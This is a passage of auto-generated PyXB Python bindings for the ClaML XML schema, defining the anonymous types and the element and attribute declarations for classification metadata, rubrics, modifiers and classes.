_module_typeBindings.STD_ANON_ = STD_ANON_
# Atomic simple type: [anonymous]
class STD_ANON_2 (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 276, 16)
_Documentation = None
STD_ANON_2._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON_2, enum_prefix=None)
STD_ANON_2.item = STD_ANON_2._CF_enumeration.addEnumeration(unicode_value='item', tag='item')
STD_ANON_2.list = STD_ANON_2._CF_enumeration.addEnumeration(unicode_value='list', tag='list')
STD_ANON_2._InitializeFacetMap(STD_ANON_2._CF_enumeration)
_module_typeBindings.STD_ANON_2 = STD_ANON_2
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 24, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Variants uses Python identifier Variants
__Variants = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Variants'), 'Variants', '__AbsentNamespace0_CTD_ANON_Variants', False, pyxb.utils.utility.Location('ClaML.xsd', 41, 4), )
Variants = property(__Variants.value, __Variants.set, None, None)
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Identifier uses Python identifier Identifier
__Identifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), 'Identifier', '__AbsentNamespace0_CTD_ANON_Identifier', True, pyxb.utils.utility.Location('ClaML.xsd', 60, 4), )
Identifier = property(__Identifier.value, __Identifier.set, None, None)
# Element Title uses Python identifier Title
__Title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Title'), 'Title', '__AbsentNamespace0_CTD_ANON_Title', False, pyxb.utils.utility.Location('ClaML.xsd', 66, 4), )
Title = property(__Title.value, __Title.set, None, None)
# Element Authors uses Python identifier Authors
__Authors = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Authors'), 'Authors', '__AbsentNamespace0_CTD_ANON_Authors', False, pyxb.utils.utility.Location('ClaML.xsd', 73, 4), )
Authors = property(__Authors.value, __Authors.set, None, None)
# Element ClassKinds uses Python identifier ClassKinds
__ClassKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), 'ClassKinds', '__AbsentNamespace0_CTD_ANON_ClassKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 85, 4), )
ClassKinds = property(__ClassKinds.value, __ClassKinds.set, None, None)
# Element RubricKinds uses Python identifier RubricKinds
__RubricKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), 'RubricKinds', '__AbsentNamespace0_CTD_ANON_RubricKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 92, 4), )
RubricKinds = property(__RubricKinds.value, __RubricKinds.set, None, None)
# Element UsageKinds uses Python identifier UsageKinds
__UsageKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), 'UsageKinds', '__AbsentNamespace0_CTD_ANON_UsageKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 99, 4), )
UsageKinds = property(__UsageKinds.value, __UsageKinds.set, None, None)
# Element Modifier uses Python identifier Modifier
__Modifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), 'Modifier', '__AbsentNamespace0_CTD_ANON_Modifier', True, pyxb.utils.utility.Location('ClaML.xsd', 142, 4), )
Modifier = property(__Modifier.value, __Modifier.set, None, None)
# Element ModifierClass uses Python identifier ModifierClass
__ModifierClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), 'ModifierClass', '__AbsentNamespace0_CTD_ANON_ModifierClass', True, pyxb.utils.utility.Location('ClaML.xsd', 154, 4), )
ModifierClass = property(__ModifierClass.value, __ModifierClass.set, None, None)
# Element Class uses Python identifier Class
__Class = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Class'), 'Class', '__AbsentNamespace0_CTD_ANON_Class', True, pyxb.utils.utility.Location('ClaML.xsd', 169, 4), )
Class = property(__Class.value, __Class.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__AbsentNamespace0_CTD_ANON_version', pyxb.binding.datatypes.anySimpleType, required=True)
__version._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 38, 12)
__version._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 38, 12)
version = property(__version.value, __version.set, None, None)
_ElementMap.update({
__Variants.name() : __Variants,
__Meta.name() : __Meta,
__Identifier.name() : __Identifier,
__Title.name() : __Title,
__Authors.name() : __Authors,
__ClassKinds.name() : __ClassKinds,
__RubricKinds.name() : __RubricKinds,
__UsageKinds.name() : __UsageKinds,
__Modifier.name() : __Modifier,
__ModifierClass.name() : __ModifierClass,
__Class.name() : __Class
})
_AttributeMap.update({
__version.name() : __version
})
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 42, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Variant uses Python identifier Variant
__Variant = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Variant'), 'Variant', '__AbsentNamespace0_CTD_ANON__Variant', True, pyxb.utils.utility.Location('ClaML.xsd', 48, 4), )
Variant = property(__Variant.value, __Variant.set, None, None)
_ElementMap.update({
__Variant.name() : __Variant
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type [anonymous] with content type MIXED
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 49, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_2_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 50, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 50, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_2 = CTD_ANON_2
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 54, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_3_name', pyxb.binding.datatypes.anySimpleType, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 55, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 55, 12)
name = property(__name.value, __name.set, None, None)
# Attribute value uses Python identifier value_
__value = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'value'), 'value_', '__AbsentNamespace0_CTD_ANON_3_value', pyxb.binding.datatypes.anySimpleType, required=True)
__value._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 56, 12)
__value._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 56, 12)
value_ = property(__value.value, __value.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_3_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 57, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 57, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__value.name() : __value,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_3 = CTD_ANON_3
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 61, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute authority uses Python identifier authority
__authority = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'authority'), 'authority', '__AbsentNamespace0_CTD_ANON_4_authority', pyxb.binding.datatypes.NMTOKEN)
__authority._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 62, 12)
__authority._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 62, 12)
authority = property(__authority.value, __authority.set, None, None)
# Attribute uid uses Python identifier uid
__uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__AbsentNamespace0_CTD_ANON_4_uid', pyxb.binding.datatypes.anySimpleType, required=True)
__uid._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 63, 12)
__uid._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 63, 12)
uid = property(__uid.value, __uid.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__authority.name() : __authority,
__uid.name() : __uid
})
_module_typeBindings.CTD_ANON_4 = CTD_ANON_4
# Complex type [anonymous] with content type MIXED
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 67, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_5_name', pyxb.binding.datatypes.NMTOKEN, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 68, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 68, 12)
name = property(__name.value, __name.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__AbsentNamespace0_CTD_ANON_5_version', pyxb.binding.datatypes.anySimpleType)
__version._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 69, 12)
__version._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 69, 12)
version = property(__version.value, __version.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__AbsentNamespace0_CTD_ANON_5_date', pyxb.binding.datatypes.anySimpleType)
__date._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 70, 12)
__date._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 70, 12)
date = property(__date.value, __date.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__version.name() : __version,
__date.name() : __date
})
_module_typeBindings.CTD_ANON_5 = CTD_ANON_5
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_6 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 74, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Author uses Python identifier Author
__Author = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Author'), 'Author', '__AbsentNamespace0_CTD_ANON_6_Author', True, pyxb.utils.utility.Location('ClaML.xsd', 80, 4), )
Author = property(__Author.value, __Author.set, None, None)
_ElementMap.update({
__Author.name() : __Author
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_6 = CTD_ANON_6
# Complex type [anonymous] with content type MIXED
class CTD_ANON_7 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 81, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_7_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 82, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 82, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_7 = CTD_ANON_7
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_8 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 86, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element ClassKind uses Python identifier ClassKind
__ClassKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), 'ClassKind', '__AbsentNamespace0_CTD_ANON_8_ClassKind', True, pyxb.utils.utility.Location('ClaML.xsd', 106, 4), )
ClassKind = property(__ClassKind.value, __ClassKind.set, None, None)
_ElementMap.update({
__ClassKind.name() : __ClassKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_8 = CTD_ANON_8
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_9 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 93, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element RubricKind uses Python identifier RubricKind
__RubricKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), 'RubricKind', '__AbsentNamespace0_CTD_ANON_9_RubricKind', True, pyxb.utils.utility.Location('ClaML.xsd', 114, 4), )
RubricKind = property(__RubricKind.value, __RubricKind.set, None, None)
_ElementMap.update({
__RubricKind.name() : __RubricKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_9 = CTD_ANON_9
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_10 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 100, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element UsageKind uses Python identifier UsageKind
__UsageKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), 'UsageKind', '__AbsentNamespace0_CTD_ANON_10_UsageKind', True, pyxb.utils.utility.Location('ClaML.xsd', 130, 4), )
UsageKind = property(__UsageKind.value, __UsageKind.set, None, None)
_ElementMap.update({
__UsageKind.name() : __UsageKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_10 = CTD_ANON_10
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_11 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 107, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Display uses Python identifier Display
__Display = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Display'), 'Display', '__AbsentNamespace0_CTD_ANON_11_Display', True, pyxb.utils.utility.Location('ClaML.xsd', 136, 4), )
Display = property(__Display.value, __Display.set, None, None)
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_11_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 111, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 111, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
__Display.name() : __Display
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_11 = CTD_ANON_11
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_12 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 131, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_12_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 132, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 132, 12)
name = property(__name.value, __name.set, None, None)
# Attribute mark uses Python identifier mark
__mark = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mark'), 'mark', '__AbsentNamespace0_CTD_ANON_12_mark', pyxb.binding.datatypes.anySimpleType, required=True)
__mark._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 133, 12)
__mark._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 133, 12)
mark = property(__mark.value, __mark.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__mark.name() : __mark
})
_module_typeBindings.CTD_ANON_12 = CTD_ANON_12
# Complex type [anonymous] with content type MIXED
class CTD_ANON_13 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 137, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__AbsentNamespace0_CTD_ANON_13_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang, required=True)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 138, 12)
lang = property(__lang.value, __lang.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_13_variants', pyxb.binding.datatypes.IDREF)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 139, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 139, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__lang.name() : __lang,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_13 = CTD_ANON_13
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_14 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 143, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_14_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_14_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_14_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_14_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_14_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 150, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 150, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_14_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 151, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 151, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_14 = CTD_ANON_14
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_15 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 155, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_15_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_15_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_15_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SuperClass uses Python identifier SuperClass
__SuperClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), 'SuperClass', '__AbsentNamespace0_CTD_ANON_15_SuperClass', False, pyxb.utils.utility.Location('ClaML.xsd', 242, 4), )
SuperClass = property(__SuperClass.value, __SuperClass.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_15_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute modifier uses Python identifier modifier
__modifier = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'modifier'), 'modifier', '__AbsentNamespace0_CTD_ANON_15_modifier', pyxb.binding.datatypes.NMTOKEN, required=True)
__modifier._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 163, 12)
__modifier._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 163, 12)
modifier = property(__modifier.value, __modifier.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_15_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 164, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 164, 12)
code = property(__code.value, __code.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_15_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 165, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 165, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_15_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 166, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 166, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SuperClass.name() : __SuperClass,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__modifier.name() : __modifier,
__code.name() : __code,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_15 = CTD_ANON_15
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_16 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 170, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
